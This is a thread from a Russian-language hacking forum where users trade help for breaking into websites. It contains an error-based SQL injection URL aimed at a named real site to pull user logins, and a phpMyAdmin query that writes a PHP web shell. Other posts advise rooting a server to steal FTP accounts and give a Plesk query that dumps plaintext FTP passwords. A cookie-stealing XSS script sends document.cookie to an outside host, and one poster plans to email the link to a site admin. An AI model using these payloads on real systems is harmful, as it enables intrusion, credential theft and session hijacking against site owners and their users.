Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    вывода и не будет, потому что это блайнд. в данном случае можно добиться вывода в ошибке. раскрутил по методу qwazar'a :
    HTML:
    http://jetterauto.ru/index/page/id/411+and+1=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cms_user_list.login,0x27,0x7e)+from+mainfra_jetter_tst.cms_user_list+order+by+login+limit+0,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
     
    1 person likes this.
  2. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Что никто не может помочь?
     
  3. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Товарищ, не знаю что за эксплоит но примерно я бы сделал такой вывод - если там написано, чтобы я проверил наличие файла sos.txt а его там нету значит эксплоит не заработал, может потому, что уязвимое ПО запатчено.
     
  4. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Вообще-то эту уязвимость обнаружил сканер.
     
  5. plaeer

    plaeer New Member

    Joined:
    8 Mar 2011
    Messages:
    149
    Likes Received:
    3
    Reputations:
    1
    Сам сплоит - http://www.securitylab.ru/poc/391481.php
     
  6. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Сканер может ошибится.
    ПО может иметь уязвимую версию но при этом таки может быть пропатченным.
     
  7. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Ну раз сканер, тогда это координально меняет ситуацию :eek:
     
    1 person likes this.
  8. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Траблы с залитием шела через phpmyadmin
    File_priv : Y
    Делаю запрос :
    SELECT '<? passthru("$cmd"); ?>' into OUTFILE '/var/www/html/web/site.com/shell.php'
    Мне в ответ:
    #1 - Can't create/write to file '/var/www/html/web/site.com/shell.php' (Errcode: 13)

    Почему вылазит такая ошибка и файл не создается?
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Прав нет же
    На запись в папку.
     
    #17209 попугай, 29 Jun 2011
    Last edited: 29 Jun 2011
    1 person likes this.
  10. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    Подскажите плиз статью на вывод данный из mysql слепой инъекции через ошибку.
    там чёто типа floor rand. токо не могу найти мануал...
     
  11. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    404
    Likes Received:
    118
    Reputations:
    23
    https://rdot.org/forum/showpost.php?p=746&postcount=3
     
    1 person likes this.
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    вот тебе пример запроса:
     
    _________________________
  13. t0wer

    t0wer New Member

    Joined:
    6 Feb 2008
    Messages:
    11
    Likes Received:
    3
    Reputations:
    0
    Есть доступ к phpmyadmin. Нужно выудить ftp логин/пароль
    Направте в нужном направлении информацией или чем капнуть туда?!
     
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    pma - это скрипт для управления базами данных и никакого отношения к фтп не имеет. единственный вариант, который возможен - это залить шелл через pma, порутать сервак и выудить фтп акк)
    клац
    есть ещё вариант найти акк в конфигах сайта. на чём он стоит?
     
    #17214 d1v, 1 Jul 2011
    Last edited: 1 Jul 2011
    2 people like this.
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Нужно зать что за ПО там стоит, и где хранятся пароли, бывает случаи (например Plesk Panell) где данные хранятся в базе, более того, в не зашифрованном виде, и для того что бы получить полный список всех фтп, достаточно выполнить:
    PHP:
    SELECT REPLACE(sys_users.home,'/home/httpd/vhosts/','') AS domain,
    sys_users.login,accounts.password FROM sys_users
    LEFT JOIN accounts on sys_users
    .account_id=accounts.id
    ORDER BY sys_users
    .home ASC
    Но в большинстве случаев, конечно же пароли так просто не достать, так что как минимум нужно закрепится, и начать исследовать систему изнутри.
     
    _________________________
    2 people like this.
  16. killerben

    killerben New Member

    Joined:
    16 Sep 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    почему когда я ввожу
    То в ифрейме выводит содержимое .js файла ?
     
  17. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    эээээ.... а что должно быть там? если хочешь выполнения js кода, то юзай <script src=...> вместо <iframe src=...>
     
    _________________________
    1 person likes this.
  18. killerben

    killerben New Member

    Joined:
    16 Sep 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо большое, там работает только iframe.

    Получилось так:
    <iframe src="http://site.ru/xss.php"></iframe>

    Содержимое xss.php
    Code:
    <script>
    img = new Image();
    img.src = "http://httpz.ru/nlj6byr15oq.gif?"+document.cookie;
    </script>
    Теперь когда захожу по адресу, присылает:

    Code:
    IP: **.***.22.87
    Query: empty
    REFERER: http://site.ru/xss.php
    AGENT: Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
    это значит работает ? Можно админу отправлять на почту ссылку ? если бы были кукисы, оно бы мне прислало их ?
     
    #17218 killerben, 1 Jul 2011
    Last edited: 1 Jul 2011
  19. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    зайди на site.ru , потом в адресной строке напиши
    Code:
    javascript:document.cookie='test_cookie=31337';
    
    и попробуй заюзать свою xss ещё раз. узнаешь наверняка.
     
    _________________________
  20. killerben

    killerben New Member

    Joined:
    16 Sep 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    таким способом присылает куки с моего сайта, а не с сайта жертвы. :(
     
Thread Status:
Not open for further replies.